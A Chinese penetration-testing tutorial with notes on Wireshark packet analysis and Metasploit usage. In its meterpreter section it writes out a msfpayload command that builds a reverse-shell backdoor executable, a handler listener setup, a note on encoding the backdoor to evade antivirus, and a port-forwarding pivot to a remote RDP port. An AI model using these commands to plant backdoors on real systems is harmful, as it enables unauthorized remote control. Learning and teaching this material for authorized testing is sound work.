渗透测试

声明：转载请指明来自华夏联盟（www.hx95.com），违者必究！
文章作者：sofu456（部分资料参考，已在最下角列出）

1.wireshark

    1.1 抓包分析

               1.TCP flags标志(wireshark抓包tcp协议flags)

                     FIN：结束，结束会话

                     SYN：同步，开始会话请求

                     RST：复位，中断一个连接

                               a.服务端口未打开；

                               b.交互过程中崩溃；

                               c.收到的tcp报文不在已建立的连接列表范围内；

                               d.响应超时或重发次数超过限制；

                               e.快速释放连接的方式

                     PUSH：推送，数据包立即发送，不等待缓冲区装满（命令响应）

                     ACK：应答

                     URG：紧急

                     ECE：拥塞提醒回应

                     CWR：拥塞窗口减少

              2.三次握手：

                     SYN---SYN/ACK---ACK

              3.四次握手

                     ACK/FIN---ACK---ACK/FIN---ACK

              4.session和cookie机制

                    session：服务端保存与客户端连接的维护资源

                    cookie：客户端保存session-id，（cookie被禁用，URL重写和表单隐藏字段）

    1.2 网络流量性能监控

             1.过滤条件为空，显示所有数据流。图形分析最大、最小值可能的问题点，更加直观

                     

             2.过滤报文http和icmp，模拟场景为icmp不连续疑似问题存在

                     

              3.IO Graphs有六个可用函数：SUM, MIN, AVG, MAX, COUNT, LOAD（将Y轴设置为“Advanced”，让Caculation域可见）

                        

    1.3 远端抓包

                   远端电脑需要安装winpcap驱动，并运行rpcapd -h命令启动远端服务，端口号2002（netstat可能查询不到），然后在interface中添加远端接口

                   

   1.4 过滤

                1.过滤种类：

                      显示过滤

                          

                      抓包过滤

                          Capture -> Capture Filters

            2.数据包类型

                   Frame:   物理层的数据帧概况

                   Ethernet II: 数据链路层以太网帧头部信息

                          ......

本文参考：

wirshark教程：

http://blog.csdn.net/robertsong2004/article/details/42803773

http://www.cnblogs.com/TankXiao/archive/2012/10/10/2711777.html

远端抓包：

http://world77.blog.51cto.com/414605/760724

wireshark io graph：

http://blog.jobbole.com/70929/

2.metasploit

      1.渗透测试

             metasploit几乎包含了渗透测试所有的工具，涉及渗透测试7个阶段。

        前期交互阶段：与客户讨论并确定渗透测试的范围和目标

        情报搜集阶段：采取各种手段搜集被攻击者的有用信息

        威胁建模阶段：通过搜集的情报信息, 标识目标系统可能存在的安全隐患

        漏洞分析阶段：分析漏洞的可行性以及最可行的攻击方法

        渗透攻击阶段：对目标进行渗透

        后攻击阶段：根据目标的不同, 灵活的应用不同技术. 让目标系统发挥更大的价值

        书写渗透报告阶段：撰写渗透报告

     使用元编程：metaprogramming语言自身作为程序数据输入的编程思想。

                            语言同时也是自身的元语言的能力称之为反射

       2.metasploit基本用法

             banner：查看版本信息

             db_driver：metasploit测试前，需要连接数据库（有的版本自动连接）db_connect

             search：查找相关模块shellcode（search name：**）

             use：使用模块back退出

             show options：查看模块参数设置

             set：设置参数信息或加载PAYLOAD（setg设置后保存）

             exploit：渗透攻击（run别名）

             check：测试target（目标操作系统）设置是否正确

             edit：编辑当前模块

             irb：ruby脚本命令行模式

             jobs：查看控制台上的任务

       3.metasploit攻击方式分类

             635种(exploit)溢出模块、314种(auxiliary)辅助模块、215种(payload)加载模块、27种(encoder免杀处理用)编码、8种(nops)

                          溢出攻击：主动溢出和被动溢出（主动攻击获取权限和监听获取权限）

       4.meterpreter模块

             msfpayload制作后门程序，在远端电脑运行,使用msfencode制作免杀

             msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X>meter.exe

             

             本机msfconsole

                   use exploit/multi/handler

                   set PAYLOAD windows/meterpreter/reverse_tcp

                   set LHOST 0.0.0.0

                   set LPORT 444

                   show options

                   run/exploit    攻击并连接远端后门,进入meterpreter

                   

              基本隧道代理功能 

                   portfwd   -h  （portfwd add -l 2222 -r 10.1.1.129 - p 3389 反弹10.1.1.129端口3389到本地2222并监听）

                   pivot 

              二级代理/三级代理

                   ...

       5.metasploit二次开发

             metasploit所有模块使用ruby编写，msfcli用户接口程序，2015.6.8已被官方团队移除，但仍然可以使用            

             metasploit所有模块继承自msf::Module,模块写好后，重启console在响应的exploit、auxiliary、payload、endcoder、nops目录中可以看到

       6.系统DEP保护        

             系统内存溢出漏洞，根因在于系统代码段和数据段没有明确的划分。DEP保护，阻止数据页执行shellcode代码

                   计算机->系统属性->高级->性能->数据执行保护（windows软件DEP、最下角显示CPU硬件是否支持DEP）

             DEP保护分为：软件DEP即SafeSEH（编译后生成合法的函数地址加以保护，以区分异常数据页函数），硬件DEP（标记NX不可执行区域）

                       SafeSEH和SEH（结构异常处理）不同，SEH需要构建SEH链表指针，以线程为单位。汇编中注册异常回调函数如下：

                            （FS寄存器，存放线程TEB数据）

            VS开发中，DEP保护链接默认开启

                   

本文参考：

metasploit教程：

http://pan.baidu.com/s/1kT3RuL5

相关论坛：

http://bbs.pediy.com(看雪论坛)

http://www.wooyun.org（乌云）

http://blog.sina.com.cn/s/blog_721d9f340100nkw5.html

http://bobao.360.cn/news/detail/1132.html 相关资源整理

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ 国外的安全技术网站（介绍meterpreter）

https://www.91ri.org/tag/metasploit

http://www.docin.com/p-499012506.html

http://www.cnblogs.com/dsky/archive/2013/04/26/3044626.html（DEP）

http://www.hx95.com/Article/Ddos/201501/85101.html （meterpreter）